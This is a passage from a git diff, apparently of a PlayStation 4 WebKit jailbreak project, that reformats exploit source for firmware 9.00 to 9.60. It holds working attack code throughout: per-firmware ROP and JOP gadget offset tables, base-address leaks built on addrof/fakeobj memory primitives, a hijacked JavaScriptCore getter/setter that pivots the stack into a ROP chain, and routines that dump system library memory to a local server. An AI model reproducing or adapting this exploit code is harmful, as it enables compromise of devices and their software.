- 'mov rax, qword ptr [rax]; ret' : 0x00000000000241cc, // `48 8b 00 c3`
- 'mov qword ptr [rdi], rax; ret' : 0x000000000000613b, // `48 89 07 c3`
- 'mov dword ptr [rdi], eax; ret' : 0x000000000000613c, // `89 07 c3`
- 'mov dword ptr [rax], esi; ret' : 0x00000000005c3482, // `89 30 c3`
+ "mov rax, qword ptr [rax]; ret": 0x00000000000241cc, // `48 8b 00 c3`
+ "mov qword ptr [rdi], rax; ret": 0x000000000000613b, // `48 89 07 c3`
+ "mov dword ptr [rdi], eax; ret": 0x000000000000613c, // `89 07 c3`
+ "mov dword ptr [rax], esi; ret": 0x00000000005c3482, // `89 30 c3`
- [jop1] : 0x0000000000000000, // ``
- [jop2] : 0x0000000000000000, // ``
- [jop3] : 0x0000000000000000, // ``
- [jop4] : 0x0000000000000000, // ``
- [jop5] : 0x0000000000000000, // ``
-}));
+ [jop1]: 0x0000000000000000, // ``
+ [jop2]: 0x0000000000000000, // ``
+ [jop3]: 0x0000000000000000, // ``
+ [jop4]: 0x0000000000000000, // ``
+ [jop5]: 0x0000000000000000, // ``
+ }),
+);
-const libc_gadget_offsets = new Map(Object.entries({
- 'getcontext' : 0x24f04,
- 'setcontext' : 0x29448,
-}));
+const libc_gadget_offsets = new Map(
+ Object.entries({
+ "getcontext": 0x24f04,
+ "setcontext": 0x29448,
+ }),
+);
-const libkernel_gadget_offsets = new Map(Object.entries({
+const libkernel_gadget_offsets = new Map(
+ Object.entries({
// returns the location of errno
- '__error' : 0xCB80,
-}));
+ "__error": 0xcb80,
+ }),
+);
export const gadgets = new Map();
function get_bases() {
- const textarea = document.createElement('textarea');
- const webcore_textarea = mem.addrof(textarea).readp(off.jsta_impl);
- const textarea_vtable = webcore_textarea.readp(0);
- const off_ta_vt = 0x2e73c18;
- const libwebkit_base = textarea_vtable.sub(off_ta_vt);
+ const textarea = document.createElement("textarea");
+ const webcore_textarea = mem.addrof(textarea).readp(off.jsta_impl);
+ const textarea_vtable = webcore_textarea.readp(0);
+ const off_ta_vt = 0x2e73c18;
+ const libwebkit_base = textarea_vtable.sub(off_ta_vt);
- const stack_chk_fail_import = libwebkit_base.add(offset_wk_stack_chk_fail);
- const stack_chk_fail_addr = resolve_import(stack_chk_fail_import);
- const off_scf = 0x1ff60;
- const libkernel_base = stack_chk_fail_addr.sub(off_scf);
+ const stack_chk_fail_import = libwebkit_base.add(offset_wk_stack_chk_fail);
+ const stack_chk_fail_addr = resolve_import(stack_chk_fail_import);
+ const off_scf = 0x1ff60;
+ const libkernel_base = stack_chk_fail_addr.sub(off_scf);
- const strlen_import = libwebkit_base.add(offset_wk_strlen);
- const strlen_addr = resolve_import(strlen_import);
- const off_strlen = 0x4fa40;
- const libc_base = strlen_addr.sub(off_strlen);
+ const strlen_import = libwebkit_base.add(offset_wk_strlen);
+ const strlen_addr = resolve_import(strlen_import);
+ const off_strlen = 0x4fa40;
+ const libc_base = strlen_addr.sub(off_strlen);
- return [
- libwebkit_base,
- libkernel_base,
- libc_base,
- ];
+ return [libwebkit_base, libkernel_base, libc_base];
}
export function init_gadget_map(gadget_map, offset_map, base_addr) {
- for (const [insn, offset] of offset_map) {
- gadget_map.set(insn, base_addr.add(offset));
- }
+ for (const [insn, offset] of offset_map) {
+ gadget_map.set(insn, base_addr.add(offset));
+ }
}
class Chain900Base extends ChainBase {
- push_end() {
- this.push_gadget('leave; ret');
- }
+ push_end() {
+ this.push_gadget("leave; ret");
+ }
- push_get_retval() {
- this.push_gadget('pop rdi; ret');
- this.push_value(this.retval_addr);
- this.push_gadget('mov qword ptr [rdi], rax; ret');
- }
+ push_get_retval() {
+ this.push_gadget("pop rdi; ret");
+ this.push_value(this.retval_addr);
+ this.push_gadget("mov qword ptr [rdi], rax; ret");
+ }
- push_get_errno() {
- this.push_gadget('pop rdi; ret');
- this.push_value(this.errno_addr);
+ push_get_errno() {
+ this.push_gadget("pop rdi; ret");
+ this.push_value(this.errno_addr);
- this.push_call(this.get_gadget('__error'));
+ this.push_call(this.get_gadget("__error"));
- this.push_gadget('mov rax, qword ptr [rax]; ret');
- this.push_gadget('mov dword ptr [rdi], eax; ret');
- }
+ this.push_gadget("mov rax, qword ptr [rax]; ret");
+ this.push_gadget("mov dword ptr [rdi], eax; ret");
+ }
- push_clear_errno() {
- this.push_call(this.get_gadget('__error'));
- this.push_gadget('pop rsi; ret');
- this.push_value(0);
- this.push_gadget('mov dword ptr [rax], esi; ret');
- }
+ push_clear_errno() {
+ this.push_call(this.get_gadget("__error"));
+ this.push_gadget("pop rsi; ret");
+ this.push_value(0);
+ this.push_gadget("mov dword ptr [rax], esi; ret");
+ }
}
export class Chain900 extends Chain900Base {
- constructor() {
- super();
- const [rdx, rdx_bak] = mem.gc_alloc(0x58);
- rdx.write64(off.js_cell, this._empty_cell);
- rdx.write64(0x50, this.stack_addr);
- this._rsp = mem.fakeobj(rdx);
- }
+ constructor() {
+ super();
+ const [rdx, rdx_bak] = mem.gc_alloc(0x58);
+ rdx.write64(off.js_cell, this._empty_cell);
+ rdx.write64(0x50, this.stack_addr);
+ this._rsp = mem.fakeobj(rdx);
+ }
- run() {
- this.check_allow_run();
- this._rop.launch = this._rsp;
- this.dirty();
- }
+ run() {
+ this.check_allow_run();
+ this._rop.launch = this._rsp;
+ this.dirty();
+ }
}
export const Chain = Chain900;
export function init(Chain) {
- const syscall_array = [];
- [libwebkit_base, libkernel_base, libc_base] = get_bases();
+ const syscall_array = [];
+ [libwebkit_base, libkernel_base, libc_base] = get_bases();
- init_gadget_map(gadgets, webkit_gadget_offsets, libwebkit_base);
- init_gadget_map(gadgets, libc_gadget_offsets, libc_base);
- init_gadget_map(gadgets, libkernel_gadget_offsets, libkernel_base);
- init_syscall_array(syscall_array, libkernel_base, 300 * KB);
+ init_gadget_map(gadgets, webkit_gadget_offsets, libwebkit_base);
+ init_gadget_map(gadgets, libc_gadget_offsets, libc_base);
+ init_gadget_map(gadgets, libkernel_gadget_offsets, libkernel_base);
+ init_syscall_array(syscall_array, libkernel_base, 300 * KB);
- let gs = Object.getOwnPropertyDescriptor(window, 'location').set;
- // JSCustomGetterSetter.m_getterSetter
- gs = mem.addrof(gs).readp(0x28);
+ let gs = Object.getOwnPropertyDescriptor(window, "location").set;
+ // JSCustomGetterSetter.m_getterSetter
+ gs = mem.addrof(gs).readp(0x28);
- // sizeof JSC::CustomGetterSetter
- const size_cgs = 0x18;
- const [gc_buf, gc_back] = mem.gc_alloc(size_cgs);
- mem.cpy(gc_buf, gs, size_cgs);
- // JSC::CustomGetterSetter.m_setter
- gc_buf.write64(0x10, get_gadget(gadgets, jop1));
+ // sizeof JSC::CustomGetterSetter
+ const size_cgs = 0x18;
+ const [gc_buf, gc_back] = mem.gc_alloc(size_cgs);
+ mem.cpy(gc_buf, gs, size_cgs);
+ // JSC::CustomGetterSetter.m_setter
+ gc_buf.write64(0x10, get_gadget(gadgets, jop1));
- const proto = Chain.prototype;
- // _rop must have a descriptor initially in order for the structure to pass
- // setHasReadOnlyOrGetterSetterPropertiesExcludingProto() thus forcing a
- // call to JSObject::putInlineSlow(). putInlineSlow() is the code path that
- // checks for any descriptor to run
- //
- // the butterfly's indexing type must be something the GC won't inspect
- // like DoubleShape. it will be used to store the JOP table's pointer
- const _rop = {get launch() {throw Error('never call')}, 0: 1.1};
- // replace .launch with the actual custom getter/setter
- mem.addrof(_rop).write64(off.js_inline_prop, gc_buf);
- proto._rop = _rop;
+ const proto = Chain.prototype;
+ // _rop must have a descriptor initially in order for the structure to pass
+ // setHasReadOnlyOrGetterSetterPropertiesExcludingProto() thus forcing a
+ // call to JSObject::putInlineSlow(). putInlineSlow() is the code path that
+ // checks for any descriptor to run
+ //
+ // the butterfly's indexing type must be something the GC won't inspect
+ // like DoubleShape. it will be used to store the JOP table's pointer
+ const _rop = {
+ get launch() {
+ throw Error("never call");
+ },
+ 0: 1.1,
+ };
+ // replace .launch with the actual custom getter/setter
+ mem.addrof(_rop).write64(off.js_inline_prop, gc_buf);
+ proto._rop = _rop;
- // JOP table
- const rax_ptrs = new BufferView(0x100);
- const rax_ptrs_p = get_view_vector(rax_ptrs);
- proto._rax_ptrs = rax_ptrs;
+ // JOP table
+ const rax_ptrs = new BufferView(0x100);
+ const rax_ptrs_p = get_view_vector(rax_ptrs);
+ proto._rax_ptrs = rax_ptrs;
- rax_ptrs.write64(0x70, get_gadget(gadgets, jop2));
- rax_ptrs.write64(0x30, get_gadget(gadgets, jop3));
- rax_ptrs.write64(0x40, get_gadget(gadgets, jop4));
- rax_ptrs.write64(0, get_gadget(gadgets, jop5));
+ rax_ptrs.write64(0x70, get_gadget(gadgets, jop2));
+ rax_ptrs.write64(0x30, get_gadget(gadgets, jop3));
+ rax_ptrs.write64(0x40, get_gadget(gadgets, jop4));
+ rax_ptrs.write64(0, get_gadget(gadgets, jop5));
- const jop_buffer_p = mem.addrof(_rop).readp(off.js_butterfly);
- jop_buffer_p.write64(0, rax_ptrs_p);
+ const jop_buffer_p = mem.addrof(_rop).readp(off.js_butterfly);
+ jop_buffer_p.write64(0, rax_ptrs_p);
- const empty = {};
- proto._empty_cell = mem.addrof(empty).read64(off.js_cell);
+ const empty = {};
+ proto._empty_cell = mem.addrof(empty).read64(off.js_cell);
- Chain.init_class(gadgets, syscall_array);
+ Chain.init_class(gadgets, syscall_array);
}
diff --git a/src/rop/ps4/950.mjs b/src/rop/ps4/950.mjs
index 9777eb7..05fd7b1 100644
--- a/src/rop/ps4/950.mjs
+++ b/src/rop/ps4/950.mjs
@@ -17,18 +17,14 @@ along with this program. If not, see . */
// 9.50, 9.51, 9.60
-import { mem } from '../../module/mem.mjs';
-import { KB } from '../../module/offset.mjs';
-import { ChainBase, get_gadget } from '../../module/chain.mjs';
-import { BufferView } from '../../module/rw.mjs';
+import { mem } from "../../module/mem.mjs";
+import { KB } from "../../module/offset.mjs";
+import { ChainBase, get_gadget } from "../../module/chain.mjs";
+import { BufferView } from "../../module/rw.mjs";
-import {
- get_view_vector,
- resolve_import,
- init_syscall_array,
-} from '../../module/memtools.mjs';
+import { get_view_vector, resolve_import, init_syscall_array } from "../../module/memtools.mjs";
-import * as off from '../../module/offset.mjs';
+import * as off from "../../module/offset.mjs";
// WebKit offsets of imported functions
const offset_wk_stack_chk_fail = 0x178;
@@ -68,7 +64,7 @@ push rdx
mov edi, 0xac9784fe
jmp qword ptr [rax]
`;
-const jop5 = 'pop rsp; ret';
+const jop5 = "pop rsp; ret";
// the ps4 firmware is compiled to use rbp as a frame pointer
//
@@ -83,180 +79,187 @@ const jop5 = 'pop rsp; ret';
// mov rsp, rbp
// pop rbp
-const webkit_gadget_offsets = new Map(Object.entries({
- 'pop rax; ret' : 0x0000000000011c46, // `58 c3`
- 'pop rbx; ret' : 0x0000000000013730, // `5b c3`
- 'pop rcx; ret' : 0x0000000000035a1e, // `59 c3`
- 'pop rdx; ret' : 0x000000000018de52, // `5a c3`
+const webkit_gadget_offsets = new Map(
+ Object.entries({
+ "pop rax; ret": 0x0000000000011c46, // `58 c3`
+ "pop rbx; ret": 0x0000000000013730, // `5b c3`
+ "pop rcx; ret": 0x0000000000035a1e, // `59 c3`
+ "pop rdx; ret": 0x000000000018de52, // `5a c3`
- 'pop rbp; ret' : 0x00000000000000b6, // `5d c3`
- 'pop rsi; ret' : 0x0000000000092a8c, // `5e c3`
- 'pop rdi; ret' : 0x000000000005d19d, // `5f c3`
- 'pop rsp; ret' : 0x00000000000253e0, // `5c c3`
+ "pop rbp; ret": 0x00000000000000b6, // `5d c3`
+ "pop rsi; ret": 0x0000000000092a8c, // `5e c3`
+ "pop rdi; ret": 0x000000000005d19d, // `5f c3`
+ "pop rsp; ret": 0x00000000000253e0, // `5c c3`
- 'pop r8; ret' : 0x000000000003fe32, // `47 58 c3`
- 'pop r9; ret' : 0x0000000000aaad51, // `47 59 c3`
+ "pop r8; ret": 0x000000000003fe32, // `47 58 c3`
+ "pop r9; ret": 0x0000000000aaad51, // `47 59 c3`
// Not found in 9.50-9.60, but not currently used in exploit
- // 'pop r10; ret' : 0x0000000000000000, // `4(1,3,5,7,9,b,d,f) 5a c3`
- 'pop r11; ret' : 0x0000000001833a21, // `47 5b c3`
+ // "pop r10; ret" : 0x0000000000000000, // `4(1,3,5,7,9,b,d,f) 5a c3`
+ "pop r11; ret": 0x0000000001833a21, // `47 5b c3`
- 'pop r12; ret' : 0x0000000000420ad1, // `47 5c c3`
- 'pop r13; ret' : 0x00000000018fc4c1, // `47 5d c3`
- 'pop r14; ret' : 0x000000000028c900, // `41 5e c3`
- 'pop r15; ret' : 0x0000000001437c8a, // `47 5f c3`
+ "pop r12; ret": 0x0000000000420ad1, // `47 5c c3`
+ "pop r13; ret": 0x00000000018fc4c1, // `47 5d c3`
+ "pop r14; ret": 0x000000000028c900, // `41 5e c3`
+ "pop r15; ret": 0x0000000001437c8a, // `47 5f c3`
- 'ret' : 0x0000000000000032, // `c3`
- 'leave; ret' : 0x0000000000056322, // `c9 c3`
+ "ret": 0x0000000000000032, // `c3`
+ "leave; ret": 0x0000000000056322, // `c9 c3`
- 'mov rax, qword ptr [rax]; ret' : 0x000000000000c671, // `48 8b 00 c3`
- 'mov qword ptr [rdi], rax; ret' : 0x0000000000010c07, // `48 89 07 c3`
- 'mov dword ptr [rdi], eax; ret' : 0x00000000000071d0, // `89 07 c3`
- 'mov dword ptr [rax], esi; ret' : 0x000000000007ebd8, // `89 30 c3`
+ "mov rax, qword ptr [rax]; ret": 0x000000000000c671, // `48 8b 00 c3`
+ "mov qword ptr [rdi], rax; ret": 0x0000000000010c07, // `48 89 07 c3`
+ "mov dword ptr [rdi], eax; ret": 0x00000000000071d0, // `89 07 c3`
+ "mov dword ptr [rax], esi; ret": 0x000000000007ebd8, // `89 30 c3`
- [jop1] : 0x0000000000000000, // ``
- [jop2] : 0x0000000000000000, // ``
- [jop3] : 0x0000000000000000, // ``
- [jop4] : 0x0000000000000000, // ``
- [jop5] : 0x0000000000000000, // ``
-}));
+ [jop1]: 0x0000000000000000, // ``
+ [jop2]: 0x0000000000000000, // ``
+ [jop3]: 0x0000000000000000, // ``
+ [jop4]: 0x0000000000000000, // ``
+ [jop5]: 0x0000000000000000, // ``
+ }),
+);
-const libc_gadget_offsets = new Map(Object.entries({
- 'getcontext' : 0x21284,
- 'setcontext' : 0x254dc,
-}));
+const libc_gadget_offsets = new Map(
+ Object.entries({
+ "getcontext": 0x21284,
+ "setcontext": 0x254dc,
+ }),
+);
-const libkernel_gadget_offsets = new Map(Object.entries({
+const libkernel_gadget_offsets = new Map(
+ Object.entries({
// returns the location of errno
- '__error' : 0xbb60,
-}));
+ "__error": 0xbb60,
+ }),
+);
export const gadgets = new Map();
function get_bases() {
- const textarea = document.createElement('textarea');
- const webcore_textarea = mem.addrof(textarea).readp(off.jsta_impl);
- const textarea_vtable = webcore_textarea.readp(0);
- const off_ta_vt = 0x2ebea68;
- const libwebkit_base = textarea_vtable.sub(off_ta_vt);
+ const textarea = document.createElement("textarea");
+ const webcore_textarea = mem.addrof(textarea).readp(off.jsta_impl);
+ const textarea_vtable = webcore_textarea.readp(0);
+ const off_ta_vt = 0x2ebea68;
+ const libwebkit_base = textarea_vtable.sub(off_ta_vt);
- const stack_chk_fail_import = libwebkit_base.add(offset_wk_stack_chk_fail);
- const stack_chk_fail_addr = resolve_import(stack_chk_fail_import);
- const off_scf = 0x28870;
- const libkernel_base = stack_chk_fail_addr.sub(off_scf);
+ const stack_chk_fail_import = libwebkit_base.add(offset_wk_stack_chk_fail);
+ const stack_chk_fail_addr = resolve_import(stack_chk_fail_import);
+ const off_scf = 0x28870;
+ const libkernel_base = stack_chk_fail_addr.sub(off_scf);
- const strlen_import = libwebkit_base.add(offset_wk_strlen);
- const strlen_addr = resolve_import(strlen_import);
- const off_strlen = 0x4c040;
- const libc_base = strlen_addr.sub(off_strlen);
+ const strlen_import = libwebkit_base.add(offset_wk_strlen);
+ const strlen_addr = resolve_import(strlen_import);
+ const off_strlen = 0x4c040;
+ const libc_base = strlen_addr.sub(off_strlen);
- return [
- libwebkit_base,
- libkernel_base,
- libc_base,
- ];
+ return [libwebkit_base, libkernel_base, libc_base];
}
export function init_gadget_map(gadget_map, offset_map, base_addr) {
- for (const [insn, offset] of offset_map) {
- gadget_map.set(insn, base_addr.add(offset));
- }
+ for (const [insn, offset] of offset_map) {
+ gadget_map.set(insn, base_addr.add(offset));
+ }
}
class Chain950Base extends ChainBase {
- push_end() {
- this.push_gadget('leave; ret');
- }
+ push_end() {
+ this.push_gadget("leave; ret");
+ }
- push_get_retval() {
- this.push_gadget('pop rdi; ret');
- this.push_value(this.retval_addr);
- this.push_gadget('mov qword ptr [rdi], rax; ret');
- }
+ push_get_retval() {
+ this.push_gadget("pop rdi; ret");
+ this.push_value(this.retval_addr);
+ this.push_gadget("mov qword ptr [rdi], rax; ret");
+ }
- push_get_errno() {
- this.push_gadget('pop rdi; ret');
- this.push_value(this.errno_addr);
+ push_get_errno() {
+ this.push_gadget("pop rdi; ret");
+ this.push_value(this.errno_addr);
- this.push_call(this.get_gadget('__error'));
+ this.push_call(this.get_gadget("__error"));
- this.push_gadget('mov rax, qword ptr [rax]; ret');
- this.push_gadget('mov dword ptr [rdi], eax; ret');
- }
+ this.push_gadget("mov rax, qword ptr [rax]; ret");
+ this.push_gadget("mov dword ptr [rdi], eax; ret");
+ }
- push_clear_errno() {
- this.push_call(this.get_gadget('__error'));
- this.push_gadget('pop rsi; ret');
- this.push_value(0);
- this.push_gadget('mov dword ptr [rax], esi; ret');
- }
+ push_clear_errno() {
+ this.push_call(this.get_gadget("__error"));
+ this.push_gadget("pop rsi; ret");
+ this.push_value(0);
+ this.push_gadget("mov dword ptr [rax], esi; ret");
+ }
}
export class Chain950 extends Chain950Base {
- constructor() {
- super();
- const [rdx, rdx_bak] = mem.gc_alloc(0x58);
- rdx.write64(off.js_cell, this._empty_cell);
- rdx.write64(0x50, this.stack_addr);
- this._rsp = mem.fakeobj(rdx);
- }
+ constructor() {
+ super();
+ const [rdx, rdx_bak] = mem.gc_alloc(0x58);
+ rdx.write64(off.js_cell, this._empty_cell);
+ rdx.write64(0x50, this.stack_addr);
+ this._rsp = mem.fakeobj(rdx);
+ }
- run() {
- this.check_allow_run();
- this._rop.launch = this._rsp;
- this.dirty();
- }
+ run() {
+ this.check_allow_run();
+ this._rop.launch = this._rsp;
+ this.dirty();
+ }
}
export const Chain = Chain950;
export function init(Chain) {
- const syscall_array = [];
- [libwebkit_base, libkernel_base, libc_base] = get_bases();
+ const syscall_array = [];
+ [libwebkit_base, libkernel_base, libc_base] = get_bases();
- init_gadget_map(gadgets, webkit_gadget_offsets, libwebkit_base);
- init_gadget_map(gadgets, libc_gadget_offsets, libc_base);
- init_gadget_map(gadgets, libkernel_gadget_offsets, libkernel_base);
- init_syscall_array(syscall_array, libkernel_base, 300 * KB);
+ init_gadget_map(gadgets, webkit_gadget_offsets, libwebkit_base);
+ init_gadget_map(gadgets, libc_gadget_offsets, libc_base);
+ init_gadget_map(gadgets, libkernel_gadget_offsets, libkernel_base);
+ init_syscall_array(syscall_array, libkernel_base, 300 * KB);
- let gs = Object.getOwnPropertyDescriptor(window, 'location').set;
- // JSCustomGetterSetter.m_getterSetter
- gs = mem.addrof(gs).readp(0x28);
+ let gs = Object.getOwnPropertyDescriptor(window, "location").set;
+ // JSCustomGetterSetter.m_getterSetter
+ gs = mem.addrof(gs).readp(0x28);
- // sizeof JSC::CustomGetterSetter
- const size_cgs = 0x18;
- const [gc_buf, gc_back] = mem.gc_alloc(size_cgs);
- mem.cpy(gc_buf, gs, size_cgs);
- // JSC::CustomGetterSetter.m_setter
- gc_buf.write64(0x10, get_gadget(gadgets, jop1));
+ // sizeof JSC::CustomGetterSetter
+ const size_cgs = 0x18;
+ const [gc_buf, gc_back] = mem.gc_alloc(size_cgs);
+ mem.cpy(gc_buf, gs, size_cgs);
+ // JSC::CustomGetterSetter.m_setter
+ gc_buf.write64(0x10, get_gadget(gadgets, jop1));
- const proto = Chain.prototype;
- // _rop must have a descriptor initially in order for the structure to pass
- // setHasReadOnlyOrGetterSetterPropertiesExcludingProto() thus forcing a
- // call to JSObject::putInlineSlow(). putInlineSlow() is the code path that
- // checks for any descriptor to run
- //
- // the butterfly's indexing type must be something the GC won't inspect
- // like DoubleShape. it will be used to store the JOP table's pointer
- const _rop = {get launch() {throw Error('never call')}, 0: 1.1};
- // replace .launch with the actual custom getter/setter
- mem.addrof(_rop).write64(off.js_inline_prop, gc_buf);
- proto._rop = _rop;
+ const proto = Chain.prototype;
+ // _rop must have a descriptor initially in order for the structure to pass
+ // setHasReadOnlyOrGetterSetterPropertiesExcludingProto() thus forcing a
+ // call to JSObject::putInlineSlow(). putInlineSlow() is the code path that
+ // checks for any descriptor to run
+ //
+ // the butterfly's indexing type must be something the GC won't inspect
+ // like DoubleShape. it will be used to store the JOP table's pointer
+ const _rop = {
+ get launch() {
+ throw Error("never call");
+ },
+ 0: 1.1,
+ };
+ // replace .launch with the actual custom getter/setter
+ mem.addrof(_rop).write64(off.js_inline_prop, gc_buf);
+ proto._rop = _rop;
- // JOP table
- const rax_ptrs = new BufferView(0x100);
- const rax_ptrs_p = get_view_vector(rax_ptrs);
- proto._rax_ptrs = rax_ptrs;
+ // JOP table
+ const rax_ptrs = new BufferView(0x100);
+ const rax_ptrs_p = get_view_vector(rax_ptrs);
+ proto._rax_ptrs = rax_ptrs;
- rax_ptrs.write64(0x70, get_gadget(gadgets, jop2));
- rax_ptrs.write64(0x30, get_gadget(gadgets, jop3));
- rax_ptrs.write64(0x40, get_gadget(gadgets, jop4));
- rax_ptrs.write64(0, get_gadget(gadgets, jop5));
+ rax_ptrs.write64(0x70, get_gadget(gadgets, jop2));
+ rax_ptrs.write64(0x30, get_gadget(gadgets, jop3));
+ rax_ptrs.write64(0x40, get_gadget(gadgets, jop4));
+ rax_ptrs.write64(0, get_gadget(gadgets, jop5));
- const jop_buffer_p = mem.addrof(_rop).readp(off.js_butterfly);
- jop_buffer_p.write64(0, rax_ptrs_p);
+ const jop_buffer_p = mem.addrof(_rop).readp(off.js_butterfly);
+ jop_buffer_p.write64(0, rax_ptrs_p);
- const empty = {};
- proto._empty_cell = mem.addrof(empty).read64(off.js_cell);
+ const empty = {};
+ proto._empty_cell = mem.addrof(empty).read64(off.js_cell);
- Chain.init_class(gadgets, syscall_array);
+ Chain.init_class(gadgets, syscall_array);
}
diff --git a/src/send.mjs b/src/send.mjs
index 508700e..07701fb 100644
--- a/src/send.mjs
+++ b/src/send.mjs
@@ -55,109 +55,96 @@ along with this program. If not, see . */
// For a LibcInternal import we searched for strlen() but you can search for
// any libc function such as memcpy().
-import * as config from './config.mjs';
+import * as config from "./config.mjs";
-import { Int } from './module/int64.mjs';
-import { Addr, mem } from './module/mem.mjs';
-import { make_buffer, find_base, resolve_import } from './module/memtools.mjs';
-import { KB, MB } from './module/offset.mjs';
+import { Int } from "./module/int64.mjs";
+import { Addr, mem } from "./module/mem.mjs";
+import { make_buffer, find_base, resolve_import } from "./module/memtools.mjs";
+import { KB, MB } from "./module/offset.mjs";
-import {
- log,
- align,
- die,
- send,
-} from './module/utils.mjs';
+import { log, align, die, send } from "./module/utils.mjs";
-import * as rw from './module/rw.mjs';
-import * as o from './module/offset.mjs';
+import * as rw from "./module/rw.mjs";
+import * as o from "./module/offset.mjs";
const origin = window.origin;
-const port = '8000';
+const port = "8000";
const url = `${origin}:${port}`;
-const textarea = document.createElement('textarea');
+const textarea = document.createElement("textarea");
// JSObject
const js_textarea = mem.addrof(textarea);
// boundaries of the .text + PT_SCE_RELRO portion of a module
function get_boundaries(leak) {
- const lib_base = find_base(leak, true, true);
- const lib_end = find_base(leak, false, false);
+ const lib_base = find_base(leak, true, true);
+ const lib_end = find_base(leak, false, false);
- return [lib_base, lib_end]
+ return [lib_base, lib_end];
}
// dump a module's .text and PT_SCE_RELRO segments only
function dump(name, lib_base, lib_end) {
- // assumed size < 4GB
- const lib_size = lib_end.sub(lib_base).lo;
- log(`${name} base: ${lib_base}`);
- log(`${name} size: ${lib_size}`);
- const lib = make_buffer(
- lib_base,
- lib_size
- );
- send(
- url,
- lib,
- `${name}.sprx.text_${lib_base}.bin`,
- () => log(`${name} sent`)
- );
+ // assumed size < 4GB
+ const lib_size = lib_end.sub(lib_base).lo;
+ log(`${name} base: ${lib_base}`);
+ log(`${name} size: ${lib_size}`);
+ const lib = make_buffer(lib_base, lib_size);
+ send(url, lib, `${name}.sprx.text_${lib_base}.bin`, () => log(`${name} sent`));
}
// dump for libSceNKWebKit.sprx
function dump_libwebkit() {
- let addr = js_textarea;
- // WebCore::HTMLTextAreaElement
- addr = addr.readp(0x18);
+ let addr = js_textarea;
+ // WebCore::HTMLTextAreaElement
+ addr = addr.readp(0x18);
- // vtable for WebCore::HTMLTextAreaElement
- // in PT_SCE_RELRO segment (p_type = 0x6100_0010)
- addr = addr.readp(0);
+ // vtable for WebCore::HTMLTextAreaElement
+ // in PT_SCE_RELRO segment (p_type = 0x6100_0010)
+ addr = addr.readp(0);
- log(`vtable: ${addr}`);
- const vtable = make_buffer(addr, 0x400);
- send(url, vtable, `vtable_${addr}.bin`, () => log('vtable sent'));
+ log(`vtable: ${addr}`);
+ const vtable = make_buffer(addr, 0x400);
+ send(url, vtable, `vtable_${addr}.bin`, () => log("vtable sent"));
- const [lib_base, lib_end] = get_boundaries(addr);
- dump('libSceNKWebKit', lib_base, lib_end);
+ const [lib_base, lib_end] = get_boundaries(addr);
+ dump("libSceNKWebKit", lib_base, lib_end);
- return lib_base;
+ return lib_base;
}
// dump for libkernel_web.sprx
function dump_libkernel(libwebkit_base) {
- const offset = 0x8d8;
- const vtable_p = js_textarea.readp(0x18).readp(0);
- // __stack_chk_fail
- const stack_chk_fail_import = libwebkit_base.add(offset);
+ const offset = 0x8d8;
+ const vtable_p = js_textarea.readp(0x18).readp(0);
+ // __stack_chk_fail
+ const stack_chk_fail_import = libwebkit_base.add(offset);
- const libkernel_leak = resolve_import(stack_chk_fail_import);
- log(`__stack_chk_fail import: ${libkernel_leak}`);
+ const libkernel_leak = resolve_import(stack_chk_fail_import);
+ log(`__stack_chk_fail import: ${libkernel_leak}`);
- const [lib_base, lib_end] = get_boundaries(libkernel_leak);
- dump('libkernel_web', lib_base, lib_end);
+ const [lib_base, lib_end] = get_boundaries(libkernel_leak);
+ dump("libkernel_web", lib_base, lib_end);
}
// dump for libSceLibcInternal.sprx
function dump_libc(libwebkit_base) {
- const offset = 0x918;
- const vtable_p = js_textarea.readp(0x18).readp(0);
- // strlen
- const strlen_import = libwebkit_base.add(offset);
+ const offset = 0x918;
+ const vtable_p = js_textarea.readp(0x18).readp(0);
+ // strlen
+ const strlen_import = libwebkit_base.add(offset);
- const libc_leak = resolve_import(strlen_import);
- log(`strlen import: ${libc_leak}`);
+ const libc_leak = resolve_import(strlen_import);
+ log(`strlen import: ${libc_leak}`);
- const [lib_base, lib_end] = get_boundaries(libc_leak);
- dump('libSceLibcInternal', lib_base, lib_end);
+ const [lib_base, lib_end] = get_boundaries(libc_leak);
+ dump("libSceLibcInternal", lib_base, lib_end);
}
function dump_webkit() {
- const libwebkit_base = dump_libwebkit();
- dump_libkernel(libwebkit_base);
- dump_libc(libwebkit_base);
+ const libwebkit_base = dump_libwebkit();
+ dump_libkernel(libwebkit_base);
+ dump_libc(libwebkit_base);
}
// See globalFuncEval() from
@@ -183,23 +170,18 @@ function dump_webkit() {
// For example, the expression "eval(1)" has the JSValue encoding of 1 passed
// to *(rdi + 0x30).
function dump_eval() {
- let addr = js_textarea;
- // WebCore::HTMLTextAreaElement
- addr = addr.readp(0x18);
+ let addr = js_textarea;
+ // WebCore::HTMLTextAreaElement
+ addr = addr.readp(0x18);
- // vtable for WebCore::HTMLTextAreaElement
- // in PT_SCE_RELRO segment (p_type = 0x6100_0010)
- addr = addr.readp(0);
+ // vtable for WebCore::HTMLTextAreaElement
+ // in PT_SCE_RELRO segment (p_type = 0x6100_0010)
+ addr = addr.readp(0);
- const libwebkit_base = find_base(addr, true, true);
- const impl = mem.addrof(eval).readp(0x18).readp(0x38);
- const offset = impl.sub(libwebkit_base);
- send(
- url,
- make_buffer(impl, 0x800),
- `eval_dump_offset_${offset}.bin`,
- () => log('sent')
- );
+ const libwebkit_base = find_base(addr, true, true);
+ const impl = mem.addrof(eval).readp(0x18).readp(0x38);
+ const offset = impl.sub(libwebkit_base);
+ send(url, make_buffer(impl, 0x800), `eval_dump_offset_${offset}.bin`, () => log("sent"));
}
// Initially we just used the vtable offset from pOOBs4 (0x1c8) and tested if
@@ -207,25 +189,17 @@ function dump_eval() {
// See howto_code_exec.txt about code execution via the vtable of a textarea
// element.
function dump_scrollLeft() {
- let proto = Object.getPrototypeOf(textarea);
- proto = Object.getPrototypeOf(proto);
- proto = Object.getPrototypeOf(proto);
+ let proto = Object.getPrototypeOf(textarea);
+ proto = Object.getPrototypeOf(proto);
+ proto = Object.getPrototypeOf(proto);
- const scrollLeft_get =
- Object.getOwnPropertyDescriptors(proto).scrollLeft.get
- ;
+ const scrollLeft_get = Object.getOwnPropertyDescriptors(proto).scrollLeft.get;
+ // get the JSCustomGetterSetterFunction
+ const js_func = mem.addrof(scrollLeft_get);
+ const getterSetter = js_func.readp(0x28);
+ const getter = getterSetter.readp(8);
- // get the JSCustomGetterSetterFunction
- const js_func = mem.addrof(scrollLeft_get);
- const getterSetter = js_func.readp(0x28);
- const getter = getterSetter.readp(8);
-
- const libwebkit_base = find_base(getter, true, true);
- const offset = getter.sub(libwebkit_base);
- send(
- url,
- make_buffer(getter, 0x800),
